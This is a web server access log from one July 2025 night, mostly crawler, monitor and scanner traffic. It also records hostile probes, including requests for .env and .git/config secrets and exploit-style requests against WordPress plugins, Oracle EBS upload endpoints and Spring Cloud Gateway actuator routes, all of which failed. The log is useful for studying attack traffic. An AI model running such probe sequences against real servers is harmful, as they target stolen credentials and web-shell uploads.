212.91.247.32 - - [01/Jul/2025:00:00:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:00:01:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [01/Jul/2025:00:02:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:00:02:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Jul/2025:00:03:46 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:00:03:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:00:04:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [01/Jul/2025:00:05:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.82.77.202 - - [01/Jul/2025:00:05:31 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
80.82.77.202 - - [01/Jul/2025:00:05:35 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:00:05:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [01/Jul/2025:00:06:54 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [01/Jul/2025:00:06:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
93.123.72.134 - - [01/Jul/2025:00:07:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.155.27.244 - - [01/Jul/2025:00:10:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
80.82.77.202 - - [01/Jul/2025:00:10:48 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
170.78.2.167 - - [01/Jul/2025:00:11:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
80.82.77.202 - - [01/Jul/2025:00:12:34 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)"
87.121.84.130 - - [01/Jul/2025:00:12:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
91.244.197.102 - - [01/Jul/2025:00:18:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.244.197.102 - - [01/Jul/2025:00:19:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.6 - - [01/Jul/2025:00:20:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.251.153.117 - - [01/Jul/2025:00:21:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.235.24.221 - - [01/Jul/2025:00:23:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
93.174.93.12 - - [01/Jul/2025:00:24:14 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [01/Jul/2025:00:24:19 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.242.226.116 - - [01/Jul/2025:00:24:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [01/Jul/2025:00:25:34 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
185.242.226.116 - - [01/Jul/2025:00:26:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
89.42.231.140 - - [01/Jul/2025:00:31:55 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
185.242.226.116 - - [01/Jul/2025:00:32:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [01/Jul/2025:00:32:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
89.42.231.140 - - [01/Jul/2025:00:34:12 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
185.242.226.116 - - [01/Jul/2025:00:35:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [01/Jul/2025:00:35:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.116 - - [01/Jul/2025:00:35:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
80.251.153.117 - - [01/Jul/2025:00:36:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
152.42.142.232 - - [01/Jul/2025:00:36:33 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "\x16\x03\x01" 501 318 "-" "-"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
152.42.142.232 - - [01/Jul/2025:00:36:34 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
89.42.231.140 - - [01/Jul/2025:00:37:14 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
77.90.153.48 - - [01/Jul/2025:00:37:20 +0200] "POST /wp-json/am-member/license HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:00:37:21 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/101.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:00:38:27 +0200] "POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0"
77.90.153.48 - - [01/Jul/2025:00:38:30 +0200] "GET /wp-content/uploads/html2wp/2z5DLEEICC4CEbE4GrygCphMurK.php HTTP/1.1" 404 363 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0"
89.42.231.140 - - [01/Jul/2025:00:39:13 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
77.90.153.48 - - [01/Jul/2025:00:40:57 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Edge/12.0 PromptMapper/9.0.3.2"
77.90.153.48 - - [01/Jul/2025:00:40:59 +0200] "GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
89.42.231.140 - - [01/Jul/2025:00:41:11 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
43.157.53.115 - - [01/Jul/2025:00:41:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
147.185.132.237 - - [01/Jul/2025:00:41:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
89.42.231.140 - - [01/Jul/2025:00:43:43 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
89.42.231.140 - - [01/Jul/2025:00:43:51 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
91.244.197.102 - - [01/Jul/2025:00:44:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [01/Jul/2025:00:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
170.39.218.2 - - [01/Jul/2025:00:45:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
170.39.218.2 - - [01/Jul/2025:00:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
170.39.218.2 - - [01/Jul/2025:00:45:06 +0200] "HELP" 501 319 "-" "-"
170.39.218.2 - - [01/Jul/2025:00:45:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
170.39.218.2 - - [01/Jul/2025:00:45:06 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "l9explore/1.2.2"
185.191.127.222 - - [01/Jul/2025:00:46:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.42.231.140 - - [01/Jul/2025:00:47:10 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
77.90.153.48 - - [01/Jul/2025:00:47:17 +0200] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15"
77.90.153.48 - - [01/Jul/2025:00:47:20 +0200] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:00:47:23 +0200] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0"
77.90.153.48 - - [01/Jul/2025:00:47:50 +0200] "POST /actuator/gateway/routes/2z5DLSU6AYUgKk2YSC9DtxPkYPO HTTP/1.1" 404 356 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
77.90.153.48 - - [01/Jul/2025:00:48:01 +0200] "POST /actuator/gateway/routes/2z5DLSU6AYUgKk2YSC9DtxPkYPO HTTP/1.1" 404 356 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0"
80.251.153.117 - - [01/Jul/2025:00:48:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.90.153.48 - - [01/Jul/2025:00:48:14 +0200] "POST /actuator/gateway/refresh HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:00:48:25 +0200] "POST /actuator/gateway/refresh HTTP/1.1" 404 329 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:00:48:38 +0200] "DELETE /actuator/gateway/routes/2z5DLSU6AYUgKk2YSC9DtxPkYPO HTTP/1.1" 405 382 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15"
185.191.127.222 - - [01/Jul/2025:00:48:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.79 - - [01/Jul/2025:00:49:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.191.127.222 - - [01/Jul/2025:00:51:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.42.231.140 - - [01/Jul/2025:00:51:49 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
43.153.10.83 - - [01/Jul/2025:00:52:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
89.42.231.140 - - [01/Jul/2025:00:53:37 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 331 "-" "-"
43.153.10.83 - - [01/Jul/2025:00:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.242.226.116 - - [01/Jul/2025:00:54:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
206.168.34.116 - - [01/Jul/2025:00:57:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.116 - - [01/Jul/2025:00:57:23 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.116 - - [01/Jul/2025:00:57:26 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
91.244.197.102 - - [01/Jul/2025:00:57:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.242.226.116 - - [01/Jul/2025:00:57:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
206.168.34.116 - - [01/Jul/2025:00:57:45 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
108.165.153.6 - - [01/Jul/2025:00:57:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
206.168.34.116 - - [01/Jul/2025:00:57:51 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
206.168.34.116 - - [01/Jul/2025:00:58:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
206.168.34.116 - - [01/Jul/2025:00:58:17 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
204.76.203.219 - - [01/Jul/2025:00:59:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.251.153.117 - - [01/Jul/2025:00:59:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.251.153.117 - - [01/Jul/2025:01:00:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
199.45.154.137 - - [01/Jul/2025:01:01:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.137 - - [01/Jul/2025:01:01:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.137 - - [01/Jul/2025:01:01:19 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
199.45.154.137 - - [01/Jul/2025:01:01:23 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.137 - - [01/Jul/2025:01:01:24 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
199.45.154.137 - - [01/Jul/2025:01:01:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
199.45.154.137 - - [01/Jul/2025:01:01:29 +0200] "GET /login HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
108.165.153.6 - - [01/Jul/2025:01:03:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [01/Jul/2025:01:05:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [01/Jul/2025:01:06:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
216.244.66.234 - - [01/Jul/2025:01:07:06 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
91.244.197.102 - - [01/Jul/2025:01:07:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.6 - - [01/Jul/2025:01:08:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [01/Jul/2025:01:09:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.127.222 - - [01/Jul/2025:01:10:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
108.165.153.6 - - [01/Jul/2025:01:11:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [01/Jul/2025:01:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.79.208.213 - - [01/Jul/2025:01:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
204.76.203.219 - - [01/Jul/2025:01:13:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.134.141.244 - - [01/Jul/2025:01:13:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
204.76.203.219 - - [01/Jul/2025:01:13:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.38.6.152 - - [01/Jul/2025:01:14:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
204.76.203.219 - - [01/Jul/2025:01:14:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.76.34.183 - - [01/Jul/2025:01:14:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
34.79.208.213 - - [01/Jul/2025:01:14:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
91.244.197.102 - - [01/Jul/2025:01:15:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
34.79.208.213 - - [01/Jul/2025:01:16:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
78.153.140.179 - - [01/Jul/2025:01:16:19 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.179 - - [01/Jul/2025:01:16:20 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (iPad; CPU OS 9_0 like Mac OS X) AppleWebKit/601.1.16 (KHTML, like Gecko) Version/8.0 Mobile/13A171a Safari/600.1.4"
78.153.140.179 - - [01/Jul/2025:01:16:20 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
78.153.140.179 - - [01/Jul/2025:01:16:20 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.138 Safari/537.36 OPR/22.0.1485.78487"
78.153.140.179 - - [01/Jul/2025:01:16:21 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) FxiOS/5.3 Mobile/14C92 Safari/602.3.12"
78.153.140.179 - - [01/Jul/2025:01:16:22 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2351.3 Safari/537.36 OPR/30.0.1835.5 (Edition developer)"
78.153.140.179 - - [01/Jul/2025:01:16:23 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:10.0) Gecko/20100101 Firefox/10.0"
78.153.140.179 - - [01/Jul/2025:01:16:24 +0200] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.14) Gecko/20090916 Ubuntu/9.04 (jaunty) Firefox/3.0.14"
204.76.203.219 - - [01/Jul/2025:01:16:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
